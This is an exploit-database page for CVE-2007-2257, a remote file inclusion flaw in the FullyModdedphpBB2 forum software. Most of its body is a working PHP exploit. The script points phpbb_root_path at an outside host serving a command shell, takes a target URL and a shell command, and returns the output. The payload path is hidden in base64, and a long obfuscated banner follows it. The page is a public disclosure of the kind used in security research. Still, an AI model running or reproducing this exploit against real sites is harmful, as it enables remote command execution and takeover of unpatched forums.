Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
FullyModdedphpBB2 Remote File Inclusion
2007-04-26 / 2007-04-27
Credit:
HACKERS PAL
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2007-2257
CWE:
CWE-Other
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
Hello,, FullyModdedphpBB2 Remote File Inclusion .. With exploit :) Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security (at) soqor (dot) net [email concealed] /* Script info ## Mod Title: FullyModdedphpBB2 ## Description: A fully modded phpBB */ Remote File Include: subscp.php?phpbb_root_path=http://psevil.googlepages.com/cmd.txt? Exploit: <?php /************************************************/ /* Fully Moded PHPBB2 Command Execution Exploit */ /* By : HACKERS PAL <security (at) soqor (dot) net [email concealed]> */ /* Website : WwW.SoQoR.NeT */ /************************************************/ error_reporting(0); ini_set("max_execution_time",0); Function get_page($url){if(function_exists("file_get_contents")){$contents=file_g et_contents($url);}else{$fp=fopen("$url","r");while($line=fread($fp,1024 )){$contents=$contents.$line;}}return$contents;} Echo "<body bgcolor=\"#000000\" text=\"#00FF00\">\n<title>Fully Moded PHPBB2 Command Execution Exploit by : HACKERS PAL :: WwW.SoQoR.NeT ::</title>\n\r"."<h2>Fully Moded PHPBB2 Command Execution\n\r"."<h3>By : HACKERS PAL [security (at) soqor (dot) net [email concealed]]\n\r"."<h3>VisiT My Website [<a href=\"http://WwW.SoQoR.NeT\">WwW.SoQoR.NeT</a>]\n\r"; $expl=base64_decode("c3Vic2NwLnBocD9waHBiYl9yb290X3BhdGg9aHR0cDovL3BzZXZ pbC5nb29nbGVwYWdlcy5jb20vY21kLnR4dD8="); $action=$_GET['action']; if($action == "") { echo "<form action=\"$PHP_SELF?action=2\" method=\"post\">\n Web URL -- Example : http://localhost/FullyModed\n <br> <input type=\"text\" name=\"url\" style=\"width:250\">\n <br> <br>\n Command : <br> <textarea name=\"query\" cols=\"70\" rows=\"5\"></textarea>\n <br>\n <br> <div align=\"center\">\n <input type=\"submit\"> </div>\n </form>\n "; } else { $exploit=$_POST['url']."/".$expl."&cmd=".$_POST['query']; $page=get_page($exploit); if(!eregi("hacking attempt",$page)) { Echo "<h1> Command Successfully executed .. Result is</h1> $page <br> Thanks For Using This exploit .. Have Fun :)<br><br><br>"; } } die(base64_decode("PGRpdiBhbGlnbj0iY2VudGVyIj4KPGZvbnQgY29sb3I9IiNGRjAwM DAiPgpHPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+cjwvZm9udD48Zm9udCBjb2xvcj0iI zAwODAwMCI+RUU8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj50PC9mb250Pjxmb250IGNvb G9yPSIjRkYwMDAwIj5aPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+CjoKPC9mb250Pgo8Z m9udCBjb2xvcj0iI0ZGMDAwMCI+CkQ8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5ldmk8L 2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDgwMDAiPkw8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlI j4tPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4wMDwvZm9udD48Zm9udCBjb2xvcj0id 2hpdGUiPgosCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQgY 29sb3I9IndoaXRlIj5vPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5oQTwvZm9udD48Z m9udCBjb2xvcj0id2hpdGUiPmphPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5saSA8L 2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkZGRkZGIj4sPC9mb250Pjxmb250IGNvbG9yPSIjRkYwM DAwIj4KRDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPnIuPC9mb250Pjxmb250IGNvbG9yP SIjMDA4MDAwIj5FPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+eDwvZm9udD48Zm9udCBjb 2xvcj0iI0ZGMDAwMCI+RTwvZm9udD48Zm9udCBjb2xvcj0id2hpdGU iPgosCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPgpHPC9mb250Pjxmb250IGNvbG9 yPSJ3aGl0ZSI+YUNrZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+UjwvZm9udD48Zm9 udCBjb2xvcj0id2hpdGUiPiAsCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPlM8L2Z vbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5wPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj4 xZDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmU8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjA wMDAiPlI8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5fPC9mb250Pjxmb250IGNvbG9yPSI jRkYwMDAwIj5OPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ZXQgLAo8L2ZvbnQ+Cjxmb25 0IGNvbG9yPSIjRkYwMDAwIj5CPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+bGFjawo8L2Z vbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5BPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI +dHRhQzwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+azwvZm9udD48Zm9udCBjb2xvcj0 id2hpdGUiPiAsCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQ gY29sb3I9IndoaXRlIj5pbmk8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ +PGZvbnQgY29sb3I9IndoaXRlIj5hPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5uPC9 mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ICwKPC9mb250Pgo8Zm9u dCBjb2xvcj0iI0ZGMDAwMCI+SjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmE8L2ZvbnQ+ PGZvbnQgY29sb3I9IiMwMDgwMDAiPnJlPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ZTwv Zm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+SDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUi Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4KQjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmE8 L2ZvbnQ+PC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5naDwvZm9udD48Zm9udCBjb2xv cj0id2hpdGUiPmRhPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5EPC9mb250Pjxmb250 IGNvbG9yPSIjRkZGRkZGIj4KLCA8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPkQ8L2Zv bnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPnIgPC9mb250Pgo8Zm9udCBjb2xvcj0iI0ZGMDAw MCI+SDwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+YTwvZm9udD48Zm9udCBjb2xvcj0i IzAwODAwMCI+Y2s8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPmU8L2ZvbnQ+PGZvbnQg Y29sb3I9IiNGRjAwMDAiPnI8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPgosPC9mb250 Pjxmb250IGNvbG9yPSJ3aGl0ZSI+PGJyPgo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAw Ij5TPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+cDwvZm9udD48Zm9udCBjb2xvcj0iIzAw ODAwMCI+ZWM8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5pYTwvZ m9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+bCBHPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0Z SI+cjwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+RUU8L2ZvbnQ+PGZvbnQgY29sb3I9I ndoaXRlIj50PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5aPC9mb250Pjxmb250IGNvb G9yPSJ3aGl0ZSI+CjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPkY8L2ZvbnQ+PGZvb nQgY29sb3I9IndoaXRlIj5vciA6CjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPlM8L 2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5vPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwI j5RPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+bzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGM DAwMCI+UjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPi48L2ZvbnQ+PGZvbnQgY29sb3I9I iNGRjAwMDAiPk48L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5lPC9mb250Pjxmb250IGNvb G9yPSIjRkYwMDAwIj5UPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+CjwvZm9udD4KPGZvb nQgY29sb3I9IiNGRjAwMDAiPlQ8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5lYTwvZm9ud D48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+TTwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPgo8L 2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5BPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0Z SI+bjwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+RDwvZm9udD 48Zm9udCBjb2xvcj0id2hpdGUiPgo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5NPC 9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ZTwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMC I+bWI8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5lcjwvZm9udD48Zm9udCBjb2xvcj0iI0 ZGMDAwMCI+UzwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPjsKPC9mb250Pgo8L2I+Cjxicj 48YnI+CjxhIHN0eWxlPSJ0ZXh0LWRlY29yYXRpb246IG5vbmUiIGhyZWY9Im1haWx0bzpzZW N1cml0eUBzb3Fvci5uZXQiPgo8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+UzwvZm9udD48Zm9udC Bjb2xvcj0iI0ZGRkZGRiI+ZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+QzwvZm9udD 48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+dTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+Uj wvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+aTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMD AwMCI+VDwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+eTwvZm9udD48Zm9udCBjb2xvcj 0iIzAwODAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+W0FUXTwvZm9udD48Zm9udCBjb2 xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+UzwvZm9udD48Zm9udCBjb2 xvcj0iI0ZGRkZGRiIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+bzwvZm9udD48Zm9udCBjb2 xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+UTw vZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+bzw vZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+Ujw vZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+W0R vVF08L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiIGZhY2U9IlZlcmRhbmEiIHNpemU9IjI iPk48L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiIGZhY2U9IlZlcmRhbmEiIHNpemU9IjI iPmU8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiIGZhY2U9IlZlcmRhbmEiIHNpemU9IjI iPlQ8L2ZvbnQ+PC9hPgo8YnI+CjxhIGhyZWY9Imh0dHA6Ly93d3cuc29xb3IubmV0IiBzdHl sZT0idGV4dC1kZWNvcmF0aW9uOiBub25lOyI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlc8L2Z vbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPnc8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDA iPlc8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDgwMDAiIGZhY2U9IlZlcmRhbmEiIHNpemU9IjI iPltEb1RdPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIiBmYWNlPSJWZXJkYW5hIiBzaXp lPSIyIj5TPC9mb250Pjxmb250IGNvbG9yPSIjRkZGRkZGIiBmYWNlPSJWZXJkYW5hIiBzaXp lPSIyIj5vPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIiBmYWNlPSJWZXJkYW5hIiBzaXp lPSIyIj5RPC9mb250Pjxmb250IGNvbG9yPSIjRkZGRkZGIiBmYWNl PSJWZXJkYW5hIiBzaXplPSIyIj5vPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIiBmYWNl PSJWZXJkYW5hIiBzaXplPSIyIj5SPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIiBmYWNl PSJWZXJkYW5hIiBzaXplPSIyIj5bRG9UXTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIg ZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+TjwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiIg ZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+ZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIg ZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+VDwvZm9udD48L2E+CjwvZGl2Pgo8L2JvZHk+")); ?>
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top